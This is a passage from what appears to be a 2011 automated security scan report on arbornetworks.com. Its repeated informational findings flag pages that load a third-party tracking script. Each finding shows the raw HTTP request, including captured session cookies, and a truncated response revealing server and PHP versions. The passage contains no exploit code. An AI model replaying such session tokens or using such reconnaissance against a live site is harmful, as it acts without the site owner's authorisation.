Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=99f449be477395a8a82b952375751e51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.93. http://www.arbornetworks.com/en/network-security-experts-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-experts-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e0ad0b3b438eff7eb9a9b7ce51f39b55; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.94. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-monitoring-solutions-for-your-industry.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=505235edf483a158ecebac85777f0743; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.95. http://www.arbornetworks.com/en/network-security-research-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-research-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=edd9b1042e0935dcfca0d82e7925fe75; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerSale
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.96. http://www.arbornetworks.com/en/network-security-visibility-products-235.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-visibility-products-235.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ca357c77fb8d9ec464ea50ba73afe23; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.97. http://www.arbornetworks.com/en/network-solutions-we-provide.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-solutions-we-provide.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ecde10bc1d085d0b4369565963e727bd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.98. http://www.arbornetworks.com/en/news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0186987ea9708d674c7b7b679faa5873; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.99. http://www.arbornetworks.com/en/partnership-inquiry-form.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6c13678309361756ea6d2a07221682c2; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:52:04 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.100. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=54f17b46b1fe1a9e43cd4c9a98aa1b2d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.101. http://www.arbornetworks.com/en/solution-partners-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solution-partners-4.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6d1a18c8fda8feedf2f017203bd9dd3a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.102. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-places-in-your-network.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1a559561f6bd471812a19e09b9f7e1b4; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.103. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-your-business-needs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2b5b85b15cf3556f87196df2b8459c1c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:12 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:12 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:13 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.104. http://www.arbornetworks.com/en/technology-partners-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/technology-partners-4.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1d8fd8cec5c231279acf78bcd7bc879a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
